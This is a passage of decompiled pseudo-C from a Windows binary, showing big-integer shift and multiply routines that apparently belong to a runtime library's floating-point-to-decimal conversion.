											_t1143 = _t1142 - _t754;
											__eflags = _t1143;
											_v1888 = _t1179;
											_t1036 = _t1179;
											_t756 =  &(( &_v472)[_t1179]);
											_v1884 = _t756;
											_t1180 = _t756;
											while(1) {
												__eflags = _t1036 - _t995;
												if(_t1036 >= _t995) {
													_t215 =  &_v1872;
													 *_t215 = _v1872 & 0x00000000;
													__eflags =  *_t215;
												} else {
													_v1872 =  *(_t1212 + _t1036 * 4 - 0x1d0);
												}
												_t217 = _t1036 - 1; // -1
												__eflags = _t217 - _t995;
												if(_t217 >= _t995) {
													_t1096 = 0;
													__eflags = 0;
												} else {
													_t1096 =  *_t1180;
												}
												_t1180 = _t1180 - 4;
												 *(_t1212 + _t1036 * 4 - 0x1d0) = _t1096 >> 0x0000001f | _v1872 + _v1872;
												_t1036 = _t1036 - 1;
												__eflags = _t1036 - 0xffffffff;
												if(_t1036 == 0xffffffff) {
													break;
												}
												_t995 = _v472;
											}
											_t1181 = _v1888;
											__eflags = _t1143 - 1;
											if(_t1143 >= 1) {
												_v472 = _t1181;
											} else {
												_v472 = _t1181 + 1;
											}
											_t1145 = 0x434 >> 5;
											E00417660(0x434 >> 5,  &_v1396, 0, 0x434);
											__eflags = 1;
											 *(_t1212 + 0xbad63d) = 1 << (0x00000434 - _v1868 & 0x0000001f);
										} else {
											_v1396 = _v1396 & 0x00000000;
											_v1392 = 0x100000;
											_v1400 = 2;
											__eflags = _t1178;
											if(_t1178 != 0) {
												_t1065 = 0;
												__eflags = 0;
												while(1) {
													_t924 =  *((intOrPtr*)(_t1212 + _t1065 - 0x570));
													__eflags = _t924 -  *((intOrPtr*)(_t1212 + _t1065 - 0x1d0));
													if(_t924 !=  *((intOrPtr*)(_t1212 + _t1065 - 0x1d0))) {
														goto L110;
													}
													_t1065 = _t1065 + 4;
													__eflags = _t1065 - 8;
													if(_t1065 != 8) {
														continue;
													} else {
														_t174 =  &_v1912;
														 *_t174 = _v1912 & 0x00000000;
														__eflags =  *_t174;
														asm("bsr eax, esi");
														if( *_t174 == 0) {
															_t925 = 0;
															__eflags = 0;
														} else {
															_t925 = _t924 + 1;
														}
														_t1199 = _t995;
														_t1163 = _t1142 - _t925;
														__eflags = _t1163;
														_v1888 = _t1199;
														_t1066 = _t1199;
														_t927 =  &(( &_v472)[_t1199]);
														_v1884 = _t927;
														_t1200 = _t927;
														while(1) {
															__eflags = _t1066 - _t995;
															if(_t1066 >= _t995) {
																_t185 =  &_v1872;
																 *_t185 = _v1872 & 0x00000000;
																__eflags =  *_t185;
															} else {
																_v1872 =  *(_t1212 + _t1066 * 4 - 0x1d0);
															}
															_t187 = _t1066 - 1; // -1
															__eflags = _t187 - _t995;
															if(_t187 >= _t995) {
																_t1124 = 0;
																__eflags = 0;
															} else {
																_t1124 =  *_t1200;
															}
															_t1200 = _t1200 - 4;
															 *(_t1212 + _t1066 * 4 - 0x1d0) = _t1124 >> 0x0000001e | _v1872 << 0x00000002;
															_t1066 = _t1066 - 1;
															__eflags = _t1066 - 0xffffffff;
															if(_t1066 == 0xffffffff) {
																break;
															}
															_t995 = _v472;
														}
														_t1201 = _v1888;
														__eflags = _t1163 - 2;
														if(_t1163 >= 2) {
															_v472 = _t1201;
														} else {
															_v472 = _t1201 + 1;
														}
														_t1145 = 0x435 >> 5;
														E00417660(0x435 >> 5,  &_v1396, 0, 0x435);
														 *(_t1212 + 0xbad63d) = 1 << (0x00000435 - _v1868 & 0x0000001f);
													}
													goto L126;
												}
											}
											goto L110;
										}
										L126:
										_t765 = _t1145 + 1;
										_t999 = 0x1cc;
										_v1400 = _t765;
										_v936 = _t765;
										__eflags = _t765 << 2;
										E0041FD4C( &_v932, 0x1cc,  &_v1396, _t765 << 2);
										_t1218 =  &(_t1214[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_v1392 = 0x100000;
										_v1400 = 2;
										__eflags = _t1178;
										if(_t1178 == 0) {
											L59:
											_t937 = _t1095 - 0x432;
											_t938 = _t937 & 0x0000001f;
											_t1205 = _t937 >> 5;
											_v1868 = _t938;
											_v1876 = _t1205;
											_v1888 = _t1142 - _t938;
											_t941 = E004356D0(1, _t1142 - _t938, 0);
											_t1070 =  *((intOrPtr*)(_t1212 + _t995 * 4 - 0x1d4));
											_t942 = _t941 - 1;
											_t118 =  &_v1912;
											 *_t118 = _v1912 & 0x00000000;
											__eflags =  *_t118;
											asm("bsr ecx, ecx");
											_v1908 = _t942;
											_v1884 =  !_t942;
											if( *_t118 == 0) {
												_t944 = 0;
												__eflags = 0;
											} else {
												_t944 = _t1070 + 1;
											}
											_t1129 = _t995 + _t1205;
											_t1165 = _t1142 - _t944;
											_v1880 = _t1165;
											_v1892 = _t1129;
											__eflags = _t1129 - 0x73;
											if(_t1129 != 0x73) {
												L65:
												_t1071 = 0;
												__eflags = 0;
											} else {
												__eflags = _v1868 - _t1165;
												if(_v1868 <= _t1165) {
													goto L65;
												} else {
													_t1071 = 1;
												}
											}
											__eflags = _t1129 - 0x73;
											if(_t1129 > 0x73) {
												L87:
												__eflags = 0;
												_t999 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E0041FD4C( &_v468, 0x1cc,  &_v1396, 0);
												_t1214 =  &(_t1214[4]);
											} else {
												__eflags = _t1071;
												if(_t1071 != 0) {
													goto L87;
												} else {
													__eflags = _t1129 - 0x72;
													if(_t1129 >= 0x72) {
														_t1129 = 0x72;
														_v1892 = _t1129;
													}
													_t1072 = _t1129;
													_v1896 = _t1072;
													__eflags = _t1129 - 0xffffffff;
													if(_t1129 != 0xffffffff) {
														_t1168 = _v1876;
														_t1207 = _t1129 - _t1168;
														__eflags = _t1207;
														_t1131 =  &_v468 + _t1207 * 4;
														while(1) {
															__eflags = _t1072 - _t1168;
															if(_t1072 < _t1168) {
																break;
															}
															__eflags = _t1207 - _t995;
															if(_t1207 >= _t995) {
																_t957 = 0;
																__eflags = 0;
															} else {
																_t957 =  *_t1131;
															}
															_v1872 = _t957;
															__eflags = _t1207 - 1 - _t995;
															if(_t1207 - 1 >= _t995) {
																_t959 = 0;
																__eflags = 0;
															} else {
																_t959 =  *(_t1131 - 4);
															}
															_t1131 = _t1131 - 4;
															_t1077 = _v1896;
															 *(_t1212 + _t1077 * 4 - 0x1d0) = (_t959 & _v1884) >> _v1888 | (_v1872 & _v1908) << _v1868;
															_t1072 = _t1077 - 1;
															_t1207 = _t1207 - 1;
															_v1896 = _t1072;
															__eflags = _t1072 - 0xffffffff;
															if(_t1072 != 0xffffffff) {
																_t995 = _v472;
																continue;
															}
															break;
														}
														_t1129 = _v1892;
														_t1165 = _v1880;
														_t1205 = _v1876;
													}
													__eflags = _t1205;
													if(_t1205 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1205 << 2);
														_t1214 =  &(_t1214[3]);
														_t1165 = _v1880;
													}
													_t999 = 0x1cc;
													__eflags = _v1868 - _t1165;
													if(_v1868 <= _t1165) {
														_v472 = _t1129;
													} else {
														_v472 = _t1129 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = 2;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1078 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1212 + _t1078 - 0x570)) -  *((intOrPtr*)(_t1212 + _t1078 - 0x1d0));
												if( *((intOrPtr*)(_t1212 + _t1078 - 0x570)) !=  *((intOrPtr*)(_t1212 + _t1078 - 0x1d0))) {
													goto L59;
												}
												_t1078 = _t1078 + 4;
												__eflags = _t1078 - 8;
												if(_t1078 != 8) {
													continue;
												} else {
													_t964 = _t1095 - 0x431;
													_t965 = _t964 & 0x0000001f;
													_t1209 = _t964 >> 5;
													_v1868 = _t965;
													_v1872 = _t1209;
													_v1908 = _t1142 - _t965;
													_t968 = E004356D0(1, _t1142 - _t965, 0);
													_t1081 =  *((intOrPtr*)(_t1212 + _t995 * 4 - 0x1d4));
													_t969 = _t968 - 1;
													_t61 =  &_v1912;
													 *_t61 = _v1912 & 0x00000000;
													__eflags =  *_t61;
													asm("bsr ecx, ecx");
													_v1884 = _t969;
													_v1888 =  !_t969;
													if( *_t61 == 0) {
														_t971 = 0;
														__eflags = 0;
													} else {
														_t971 = _t1081 + 1;
													}
													_t1133 = _t995 + _t1209;
													_t1169 = _t1142 - _t971;
													_v1880 = _t1169;
													_v1896 = _t1133;
													__eflags = _t1133 - 0x73;
													if(_t1133 != 0x73) {
														L34:
														_t1082 = 0;
														__eflags = 0;
													} else {
														__eflags = _v1868 - _t1169;
														if(_v1868 <= _t1169) {
															goto L34;
														} else {
															_t1082 = 1;
														}
													}
													__eflags = _t1133 - 0x73;
													if(_t1133 > 0x73) {
														L56:
														__eflags = 0;
														_t999 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E0041FD4C( &_v468, 0x1cc,  &_v1396, 0);
														_t1214 =  &(_t1214[4]);
													} else {
														__eflags = _t1082;
														if(_t1082 != 0) {
															goto L56;
														} else {
															__eflags = _t1133 - 0x72;
															if(_t1133 >= 0x72) {
																_t1133 = 0x72;
																_v1896 = _t1133;
															}
															_t1085 = _t1133;
															_v1892 = _t1085;
															__eflags = _t1133 - 0xffffffff;
															if(_t1133 != 0xffffffff) {
																_t1172 = _v1872;
																_t1211 = _t1133 - _t1172;
																__eflags = _t1211;
																_t1135 =  &_v468 + _t1211 * 4;
																while(1) {
																	__eflags = _t1085 - _t1172;
																	if(_t1085 < _t1172) {
																		break;
																	}
																	__eflags = _t1211 - _t995;
																	if(_t1211 >= _t995) {
																		_t980 = 0;
																		__eflags = 0;
																	} else {
																		_t980 =  *_t1135;
																	}
																	_v1876 = _t980;
																	__eflags = _t1211 - 1 - _t995;
																	if(_t1211 - 1 >= _t995) {
																		_t982 = 0;
																		__eflags = 0;
																	} else {
																		_t982 =  *(_t1135 - 4);
																	}
																	_t1135 = _t1135 - 4;
																	_t1090 = _v1892;
																	 *(_t1212 + _t1090 * 4 - 0x1d0) = (_t982 & _v1888) >> _v1908 | (_v1876 & _v1884) << _v1868;
																	_t1085 = _t1090 - 1;
																	_t1211 = _t1211 - 1;
																	_v1892 = _t1085;
																	__eflags = _t1085 - 0xffffffff;
																	if(_t1085 != 0xffffffff) {
																		_t995 = _v472;
																		continue;
																	}
																	break;
																}
																_t1133 = _v1896;
																_t1169 = _v1880;
																_t1209 = _v1872;
															}
															__eflags = _t1209;
															if(_t1209 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1209 << 2);
																_t1214 =  &(_t1214[3]);
																_t1169 = _v1880;
															}
															_t999 = 0x1cc;
															__eflags = _v1868 - _t1169;
															if(_v1868 <= _t1169) {
																_v472 = _t1133;
															} else {
																_v472 = _t1133 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t976 = 4;
													__eflags = 1;
													_v1396 = _t976;
													_v1400 = 1;
													_v936 = 1;
													_push(_t976);
												}
												goto L58;
											}
											goto L59;
										}
										L58:
										_push( &_v1396);
										_push(_t999);
										_push( &_v932);
										E0041FD4C();
										_t1218 =  &(_t1214[4]);
									}
									_t770 = _v1900;
									_t1038 = 0xa;
									_v1888 = _t1038;
									__eflags = _t770;
									if(_t770 < 0) {
										_t771 =  ~_t770;
										_t772 = _t771 / _t1038;
										_v1892 = _t772;
										_t1039 = _t771 % _t1038;
										_v1912 = _t1039;
										__eflags = _t772;
										if(_t772 == 0) {
											L249:
											__eflags = _t1039;
											if(_t1039 != 0) {
												_t809 =  *(0x43d794 + _t1039 * 4);
												_v1912 = _t809;
												__eflags = _t809;
												if(_t809 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t809 - 1;
													if(_t809 != 1) {
														_t1050 = _v472;
														__eflags = _t1050;
														if(_t1050 != 0) {
															_t1151 = 0;
															_t1187 = 0;
															__eflags = 0;
															do {
																_t1108 = _t809 *  *(_t1212 + _t1187 * 4 - 0x1d0) >> 0x20;
																 *(_t1212 + _t1187 * 4 - 0x1d0) = _t809 *  *(_t1212 + _t1187 * 4 - 0x1d0) + _t1151;
																_t809 = _v1912;
																asm("adc edx, 0x0");
																_t1187 = _t1187 + 1;
																_t1151 = _t1108;
																__eflags = _t1187 - _t1050;
															} while (_t1187 != _t1050);
															__eflags = _t1151;
															if(_t1151 != 0) {
																_t816 = _v472;
																__eflags = _t816 - 0x73;
																if(_t816 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1212 + _t816 * 4 - 0x1d0) = _t1151;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t772 - 0x26;
												if(_t772 > 0x26) {
													_t772 = 0x26;
												}
												_t1051 =  *(0x43d6fe + _t772 * 4) & 0x000000ff;
												_v1868 = _t772;
												_v1400 = ( *(0x43d6fe + _t772 * 4) & 0x000000ff) + ( *(0x43d6ff + _t772 * 4) & 0x000000ff);
												E00417660(_t1051 << 2,  &_v1396, 0, _t1051 << 2);
												_t827 = E004170E0( &(( &_v1396)[_t1051]), 0x43cdf8 + ( *(0x43d6fc + _v1868 * 4) & 0x0000ffff) * 4, ( *(0x43d6ff + _t772 * 4) & 0x000000ff) << 2);
												_t1154 = _v1400;
												_t1218 =  &(_t1218[6]);
												__eflags = _t1154 - 1;
												if(_t1154 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1154 - _v472;
														_t1109 =  &_v1396;
														_t502 = _t1154 - _v472 > 0;
														__eflags = _t502;
														_t828 = _t827 & 0xffffff00 | _t502;
														if(_t502 >= 0) {
															_t1109 =  &_v468;
														}
														_v1876 = _t1109;
														_t1052 =  &_v468;
														__eflags = _t828;
														if(_t828 == 0) {
															_t1052 =  &_v1396;
														}
														_v1908 = _t1052;
														__eflags = _t828;
														if(_t828 == 0) {
															_t1053 = _v472;
															_v1896 = _t1053;
														} else {
															_t1053 = _t1154;
															_v1896 = _t1154;
														}
														__eflags = _t828;
														if(_t828 != 0) {
															_t1154 = _v472;
														}
														_t829 = 0;
														_t1189 = 0;
														_v1864 = 0;
														__eflags = _t1053;
														if(_t1053 == 0) {
															L243:
															_v472 = _t829;
															_t830 = _t829 << 2;
															__eflags = _t830;
															_push(_t830);
															_t831 =  &_v1860;
															goto L244;
														} else {
															do {
																__eflags =  *(_t1109 + _t1189 * 4);
																if( *(_t1109 + _t1189 * 4) != 0) {
																	_t1112 = 0;
																	_t1054 = _t1189;
																	_v1880 = _v1880 & 0;
																	_v1872 = 0;
																	__eflags = _t1154;
																	if(_t1154 == 0) {
																		L240:
																		__eflags = _t1054 - 0x73;
																		if(_t1054 == 0x73) {
																			goto L258;
																		} else {
																			_t1053 = _v1896;
																			_t1109 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1054 - 0x73;
																			if(_t1054 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1054 - _t829;
																			if(_t1054 == _t829) {
																				 *(_t1212 + _t1054 * 4 - 0x740) =  *(_t1212 + _t1054 * 4 - 0x740) & 0x00000000;
																				_t849 = _v1880 + 1 + _t1189;
																				__eflags = _t849;
																				_v1864 = _t849;
																			}
																			_t842 =  *(_v1908 + _v1880 * 4);
																			_t1114 = _v1876;
																			_t1112 = _t842 *  *(_t1114 + _t1189 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1212 + _t1054 * 4 - 0x740) =  *(_t1212 + _t1054 * 4 - 0x740) + _t842 *  *(_t1114 + _t1189 * 4) + _v1872;
																			asm("adc edx, 0x0");
																			_t846 = _v1880 + 1;
																			_t1054 = _t1054 + 1;
																			_v1880 = _t846;
																			__eflags = _t846 - _t1154;
																			_v1872 = _t1112;
																			_t829 = _v1864;
																			_v1928 = _t1112;
																			if(_t846 != _t1154) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1112;
																				if(_t1112 == 0) {
																					goto L240;
																				}
																				__eflags = _t1054 - 0x73;
																				if(_t1054 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1054 - _t829;
																					if(_t1054 == _t829) {
																						_t559 = _t1212 + _t1054 * 4 - 0x740;
																						 *_t559 =  *(_t1212 + _t1054 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t559;
																						_t565 = _t1054 + 1; // 0x1
																						_v1864 = _t565;
																					}
																					_t840 = _t1112;
																					_t1112 = 0;
																					 *(_t1212 + _t1054 * 4 - 0x740) =  *(_t1212 + _t1054 * 4 - 0x740) + _t840;
																					_t829 = _v1864;
																					asm("adc edx, edx");
																					_t1054 = _t1054 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1189 - _t829;
																	if(_t1189 == _t829) {
																		 *(_t1212 + _t1189 * 4 - 0x740) =  *(_t1212 + _t1189 * 4 - 0x740) & 0x00000000;
																		_t521 = _t1189 + 1; // 0x1
																		_t829 = _t521;
																		_v1864 = _t829;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1189 = _t1189 + 1;
																__eflags = _t1189 - _t1053;
															} while (_t1189 != _t1053);
															goto L243;
														}
													} else {
														_t1190 = _v468;
														_v1928 = _t1190;
														_v472 = _t1154;
														E0041FD4C( &_v468, _t999,  &_v1396, _t1154 << 2);
														_t1218 =  &(_t1218[4]);
														__eflags = _t1190;
														if(_t1190 == 0) {
															goto L202;
														} else {
															__eflags = _t1190 - 1;
															if(_t1190 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1055 = 0;
																	_t1155 = _v1928;
																	_t1191 = 0;
																	__eflags = 0;
																	_t1007 = _v472;
																	do {
																		_t858 = _t1155;
																		_t1110 = _t858 *  *(_t1212 + _t1191 * 4 - 0x1d0) >> 0x20;
																		 *(_t1212 + _t1191 * 4 - 0x1d0) = _t858 *  *(_t1212 + _t1191 * 4 - 0x1d0) + _t1055;
																		asm("adc edx, 0x0");
																		_t1191 = _t1191 + 1;
																		_t1055 = _t1110;
																		__eflags = _t1191 - _t1007;
																	} while (_t1191 != _t1007);
																	goto L207;
																}
															}
														}
													}
												} else {
													_t1156 = _v1396;
													__eflags = _t1156;
													if(_t1156 != 0) {
														__eflags = _t1156 - 1;
														if(_t1156 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1056 = 0;
																_t1192 = 0;
																__eflags = 0;
																_t1006 = _v472;
																do {
																	_t863 = _t1156;
																	_t1111 = _t863 *  *(_t1212 + _t1192 * 4 - 0x1d0) >> 0x20;
																	 *(_t1212 + _t1192 * 4 - 0x1d0) = _t863 *  *(_t1212 + _t1192 * 4 - 0x1d0) + _t1056;
																	asm("adc edx, 0x0");
																	_t1192 = _t1192 + 1;
																	_t1056 = _t1111;
																	__eflags = _t1192 - _t1006;
																} while (_t1192 != _t1006);
																L207:
																_t999 = 0x1cc;
																__eflags = _t1055;
																if(_t1055 == 0) {
																	goto L245;
																} else {
																	_t861 = _v472;
																	__eflags = _t861 - 0x73;
																	if(_t861 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E0041FD4C( &_v468, _t999,  &_v2404, 0);
																		_t1218 =  &(_t1218[4]);
																		_t834 = 0;
																	} else {
																		 *(_t1212 + _t861 * 4 - 0x1d0) = _t1055;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L202:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t831 =  &_v2404;
														L244:
														_push(_t831);
														_push(_t999);
														_push( &_v468);
														E0041FD4C();
														_t1218 =  &(_t1218[4]);
														L245:
														_t834 = 1;
													}
												}
												L246:
												__eflags = _t834;
												if(_t834 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t812 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t772 = _v1892 - _v1868;
												__eflags = _t772;
												_v1892 = _t772;
											} while (_t772 != 0);
											_t1039 = _v1912;
											goto L249;
										}
									} else {
										_t866 = _t770 / _t1038;
										_v1908 = _t866;
										_t1057 = _t770 % _t1038;
										_v1928 = _t1057;
										__eflags = _t866;
										if(_t866 == 0) {
											L183:
											__eflags = _t1057;
											if(_t1057 != 0) {
												_t867 =  *(0x43d794 + _t1057 * 4);
												_v1928 = _t867;
												__eflags = _t867;
												if(_t867 != 0) {
													__eflags = _t867 - 1;
													if(_t867 != 1) {
														_t1058 = _v936;
														__eflags = _t1058;
														if(_t1058 != 0) {
															_t1157 = 0;
															_t1193 = 0;
															__eflags = 0;
															do {
																_t1116 = _t867 *  *(_t1212 + _t1193 * 4 - 0x3a0) >> 0x20;
																 *(_t1212 + _t1193 * 4 - 0x3a0) = _t867 *  *(_t1212 + _t1193 * 4 - 0x3a0) + _t1157;
																_t867 = _v1928;
																asm("adc edx, 0x0");
																_t1193 = _t1193 + 1;
																_t1157 = _t1116;
																__eflags = _t1193 - _t1058;
															} while (_t1193 != _t1058);
															__eflags = _t1157;
															if(_t1157 != 0) {
																_t870 = _v936;
																__eflags = _t870 - 0x73;
																if(_t870 >= 0x73) {
																	goto L185;
																} else {
																	 *(_t1212 + _t870 * 4 - 0x3a0) = _t1157;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L185:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L189;
												}
											}
										} else {
											do {
												__eflags = _t866 - 0x26;
												if(_t866 > 0x26) {
													_t866 = 0x26;
												}
												_t1059 =  *(0x43d6fe + _t866 * 4) & 0x000000ff;
												_v1876 = _t866;
												_v1400 = ( *(0x43d6fe + _t866 * 4) & 0x000000ff) + ( *(0x43d6ff + _t866 * 4) & 0x000000ff);
												E00417660(_t1059 << 2,  &_v1396, 0, _t1059 << 2);
												_t883 = E004170E0( &(( &_v1396)[_t1059]), 0x43cdf8 + ( *(0x43d6fc + _v1876 * 4) & 0x0000ffff) * 4, ( *(0x43d6ff + _t866 * 4) & 0x000000ff) << 2);
												_t1160 = _v1400;
												_t1218 =  &(_t1218[6]);
												__eflags = _t1160 - 1;
												if(_t1160 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1160 - _v936;
														_t1117 =  &_v1396;
														_t314 = _t1160 - _v936 > 0;
														__eflags = _t314;
														_t884 = _t883 & 0xffffff00 | _t314;
														if(_t314 >= 0) {
															_t1117 =  &_v932;
														}
														_v1868 = _t1117;
														_t1060 =  &_v932;
														__eflags = _t884;
														if(_t884 == 0) {
															_t1060 =  &_v1396;
														}
														_v1872 = _t1060;
														__eflags = _t884;
														if(_t884 == 0) {
															_t1061 = _v936;
															_v1892 = _t1061;
														} else {
															_t1061 = _t1160;
															_v1892 = _t1160;
														}
														__eflags = _t884;
														if(_t884 != 0) {
															_t1160 = _v936;
														}
														_t885 = 0;
														_t1195 = 0;
														_v1864 = 0;
														__eflags = _t1061;
														if(_t1061 == 0) {
															L176:
															_v936 = _t885;
															_t886 = _t885 << 2;
															__eflags = _t886;
															goto L177;
														} else {
															do {
																__eflags =  *(_t1117 + _t1195 * 4);
																if( *(_t1117 + _t1195 * 4) != 0) {
																	_t1120 = 0;
																	_t1062 = _t1195;
																	_v1880 = _v1880 & 0;
																	_v1896 = 0;
																	__eflags = _t1160;
																	if(_t1160 == 0) {
																		L173:
																		__eflags = _t1062 - 0x73;
																		if(_t1062 == 0x73) {
																			goto L186;
																		} else {
																			_t1061 = _v1892;
																			_t1117 = _v1868;
																			goto L175;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1062 - 0x73;
																			if(_t1062 == 0x73) {
																				goto L168;
																			}
																			__eflags = _t1062 - _t885;
																			if(_t1062 == _t885) {
																				 *(_t1212 + _t1062 * 4 - 0x740) =  *(_t1212 + _t1062 * 4 - 0x740) & 0x00000000;
																				_t905 = _v1880 + 1 + _t1195;
																				__eflags = _t905;
																				_v1864 = _t905;
																			}
																			_t898 =  *(_v1872 + _v1880 * 4);
																			_t1122 = _v1868;
																			_t1120 = _t898 *  *(_t1122 + _t1195 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1212 + _t1062 * 4 - 0x740) =  *(_t1212 + _t1062 * 4 - 0x740) + _t898 *  *(_t1122 + _t1195 * 4) + _v1896;
																			asm("adc edx, 0x0");
																			_t902 = _v1880 + 1;
																			_t1062 = _t1062 + 1;
																			_v1880 = _t902;
																			__eflags = _t902 - _t1160;
																			_v1896 = _t1120;
																			_t885 = _v1864;
																			_v1912 = _t1120;
																			if(_t902 != _t1160) {
																				continue;
																			} else {
																				goto L168;
																			}
																			while(1) {
																				L168:
																				__eflags = _t1120;
																				if(_t1120 == 0) {
																					goto L173;
																				}
																				__eflags = _t1062 - 0x73;
																				if(_t1062 == 0x73) {
																					L186:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t893 =  &_v2404;
																					goto L187;
																				} else {
																					__eflags = _t1062 - _t885;
																					if(_t1062 == _t885) {
																						_t371 = _t1212 + _t1062 * 4 - 0x740;
																						 *_t371 =  *(_t1212 + _t1062 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t371;
																						_t377 = _t1062 + 1; // 0x1
																						_v1864 = _t377;
																					}
																					_t896 = _t1120;
																					_t1120 = 0;
																					 *(_t1212 + _t1062 * 4 - 0x740) =  *(_t1212 + _t1062 * 4 - 0x740) + _t896;
																					_t885 = _v1864;
																					asm("adc edx, edx");
																					_t1062 = _t1062 + 1;
																					continue;
																				}
																				goto L180;
																			}
																			goto L173;
																		}
																		goto L168;
																	}
																} else {
																	__eflags = _t1195 - _t885;
																	if(_t1195 == _t885) {
																		 *(_t1212 + _t1195 * 4 - 0x740) =  *(_t1212 + _t1195 * 4 - 0x740) & 0x00000000;
																		_t333 = _t1195 + 1; // 0x1
																		_t885 = _t333;
																		_v1864 = _t885;
																	}
																	goto L175;
																}
																goto L180;
																L175:
																_t1195 = _t1195 + 1;
																__eflags = _t1195 - _t1061;
															} while (_t1195 != _t1061);
															goto L176;
														}
													} else {
														_t1196 = _v932;
														_v1884 = _t1196;
														_v936 = _t1160;
														E0041FD4C( &_v932, _t999,  &_v1396, _t1160 << 2);
														_t1218 =  &(_t1218[4]);
														__eflags = _t1196;
														if(_t1196 != 0) {
															__eflags = _t1196 - 1;
															if(_t1196 == 1) {
																goto L179;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L179;
																} else {
																	_t1063 = 0;
																	_t1161 = _v1884;
																	_t1197 = 0;
																	__eflags = 0;
																	_t1009 = _v936;
																	do {
																		_t913 = _t1161;
																		_t1118 = _t913 *  *(_t1212 + _t1197 * 4 - 0x3a0) >> 0x20;
																		 *(_t1212 + _t1197 * 4 - 0x3a0) = _t913 *  *(_t1212 + _t1197 * 4 - 0x3a0) + _t1063;
																		asm("adc edx, 0x0");
																		_t1197 = _t1197 + 1;
																		_t1063 = _t1118;
																		__eflags = _t1197 - _t1009;
																	} while (_t1197 != _t1009);
																	goto L147;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t887 =  &_v1396;
															goto L178;
														}
													}
												} else {
													_t1162 = _v1396;
													__eflags = _t1162;
													if(_t1162 != 0) {
														__eflags = _t1162 - 1;
														if(_t1162 == 1) {
															goto L179;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L179;
															} else {
																_t1064 = 0;
																_t1198 = 0;
																__eflags = 0;
																_t1008 = _v936;
																do {
																	_t920 = _t1162;
																	_t1119 = _t920 *  *(_t1212 + _t1198 * 4 - 0x3a0) >> 0x20;
																	 *(_t1212 + _t1198 * 4 - 0x3a0) = _t920 *  *(_t1212 + _t1198 * 4 - 0x3a0) + _t1064;
																	asm("adc edx, 0x0");
																	_t1198 = _t1198 + 1;
																	_t1064 = _t1119;
																	__eflags = _t1198 - _t1008;
																} while (_t1198 != _t1008);
																L147:
																_t999 = 0x1cc;
																__eflags = _t1063;
																if(_t1063 == 0) {
																	goto L179;
																} else {
																	_t916 = _v936;
																	__eflags = _t916 - 0x73;
																	if(_t916 < 0x73) {
																		 *(_t1212 + _t916 * 4 - 0x3a0) = _t1063;
																		_v936 = _v936 + 1;
																		goto L179;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t893 =  &_v1396;
																		L187:
																		_push(_t893);
																		_push(_t999);
																		_push( &_v932);
																		E0041FD4C();
																		_t1218 =  &(_t1218[4]);
																		_t890 = 0;
																	}
																}
															}
														}
													} else {
														_t886 = 0;
														_v1864 = 0;
														_v936 = 0;
														L177:
														_push(_t886);
														_t887 =  &_v1860;
														L178:
														_push(_t887);
														_push(_t999);
														_push( &_v932);
														E0041FD4C();
														_t1218 =  &(_t1218[4]);
														L179:
														_t890 = 1;
													}
												}
												L180:
												__eflags = _t890;
												if(_t890 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t406 =  &_v936;
													 *_t406 = _v936 & 0x00000000;
													__eflags =  *_t406;
													_push(0);
													L189:
													_push( &_v2404);
													_t812 =  &_v932;
													L262:
													_push(_t999);
													_push(_t812);
													E0041FD4C();
													_t1218 =  &(_t1218[4]);
												} else {
													goto L181;
												}
												goto L263;
												L181:
												_t866 = _v1908 - _v1876;
												__eflags = _t866;
												_v1908 = _t866;
											} while (_t866 != 0);
											_t1057 = _v1928;
											goto L183;
										}
									}
									L263:
									_t1146 = _v1904;
									_t1184 = _t1146;
									_t1040 = _v472;
									_v1876 = _t1184;
									__eflags = _t1040;
									if(_t1040 != 0) {
										_t1186 = 0;
